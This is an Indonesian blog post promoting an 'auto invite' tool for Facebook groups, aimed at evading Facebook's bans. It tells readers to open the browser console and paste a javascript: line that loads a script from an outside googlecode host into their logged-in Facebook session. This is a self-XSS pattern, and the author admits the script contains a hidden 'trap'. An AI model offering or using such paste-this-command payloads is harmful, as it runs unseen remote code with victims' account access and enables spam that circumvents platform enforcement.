(NEW) Auto Invit Facebook Grup

hy KK ketemu lagi dengan saya orang ter keren di dunia nyata dan dunia maya wkwkwkwkw
tentunya masih tetep di acara kebangaan kita smua
aseek  kali ini saya mau share
new auto invite facebook
namanya juga facebook dikit dikit main banned 
auto invit yang lama kan udah ke banned ini ada yang baru lagi lohh
kalau auto invit yang beredar di pasaran saat ini itu kebanyaakan menggunakan GRESMONKEY
kelamaan dong mau infit orang ajah pake instal instalan segala ckckckc keburu bilangnya habis dehhh

nah bagai mana cara menggunakan auto infit ini
masih seperti yg dulu dulu KK jadi caranya gini

tekan ctrl sift k  tahan smua  lalu akan keluar lebel seperti ini
wajib pakai moozila yah kk

 
 
 trus copy code di bawah ini

 javascript:(function(){document.body.appendChild(document.createElement('script')).src='http://grup-facebook-gue.googlecode.com/files/facebookk.js';})();
masukan di lebel yang muncul  tadi kemudian paste  nah kalau udah di paste  tinggal enter
dan akan muncul lebel baru lagi seperti ini kk

  nah udah beser begituan doang og caranya

kalau kalian ingin meramaikan grup facebook anda pakai cara begituan juga di dalam scriptnya itu di pasangin jebakan batman kalu mau di edit id grupnya
silahkan di edit ckckckckckc

ok kk tetap semangat dan teruslah berkarya di dunia maya salam pramuka  :p 

0 Response to "(NEW) Auto Invit Facebook Grup "

Post a Comment

- Jika Berkomentar , Berkomentarlah Dengan Sopan Dan Baik
- Pakai Pilihan Anonymous jika Anda Tidak Mempunyai Blog.

- Di Larang Menautkan Link Secara Langsung
- Di Larang Politics Dalam Bentuk Apapun
- Di Larang Spam

MOHON MAAF JIKA COMENT ANDA TIDAK SAYA JAWAB KARENA SAYA TIDAK ONLINE 24 JAM DIKARENAKAN BANYAK URUSAN DI DUNIA NYATA.